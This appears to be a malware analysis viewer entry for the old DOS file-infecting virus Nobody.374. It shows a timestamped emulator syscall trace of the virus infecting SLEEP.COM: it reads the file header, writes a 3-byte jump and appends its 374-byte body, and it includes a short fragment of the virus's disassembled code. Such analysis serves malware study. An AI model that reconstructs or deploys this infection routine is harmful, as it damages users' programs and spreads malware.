Sample viewer

vx.netlux.org/Virus.DOS.Nobody.374

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:51.84525879Z 44 PC: 2249c | Get time 0x2249c: mov al, dh
0x2249e: add al, dl
0x224a0: stosb byte ptr es:[di], al
0x224a1: mov si, 0xfb26
0x224a4: mov di, 0x100
0x224a7: movsw word ptr es:[di], word ptr [si]
0x224a8: movsb byte ptr es:[di], byte ptr [si]
0x224a9: mov ah, 0x1a
0x224ab: mov dx, 0xff00
0x224ae: int 0x21
0x224b0: mov ah, 0x4e
0x224b2: mov dx, si
0x224b4: mov cx, 0x27
0x224b7: int 0x21
0x224b9: jae 0x224be
0x224bb: jmp 0x225aa
0x224be: mov ax, word ptr [0xff1c]
0x224c1: or ax, ax
0x224c3: jne 0x22513
0x224c5: mov ax, word ptr [0xff1a]
2018-12-17T22:48:51.847826547Z 26 PC: 224b0 | Set disk transfer address
2018-12-17T22:48:51.848805795Z 78 PC: 224b9 | Find first file
2018-12-17T22:48:51.854603002Z 61 PC: 224e6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:48:51.861450699Z 63 PC: 224f4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:48:51.867984584Z 62 PC: 224f8 | Close file
2018-12-17T22:48:51.877382466Z 61 PC: 22522 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:48:51.883800938Z 63 PC: 22533 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:48:51.886458355Z 62 PC: 22537 | Close file
2018-12-17T22:48:51.888309468Z 67 PC: 22562 | Get or set file attributes
2018-12-17T22:48:51.904917039Z 61 PC: 2256a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:48:51.911319467Z 64 PC: 22578 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:48:51.913872098Z 66 PC: 22581 | Move file pointer
2018-12-17T22:48:51.915111399Z 64 PC: 2258b | Write file or device (Write 374 bytes on handle 5)
2018-12-17T22:48:51.923055996Z 87 PC: 22598 | Get or set file date and time
2018-12-17T22:48:51.924398508Z 62 PC: 2259c | Close file
2018-12-17T22:48:51.932346223Z 67 PC: 225aa | Get or set file attributes
2018-12-17T22:48:51.949928925Z 26 PC: 225b1 | Set disk transfer address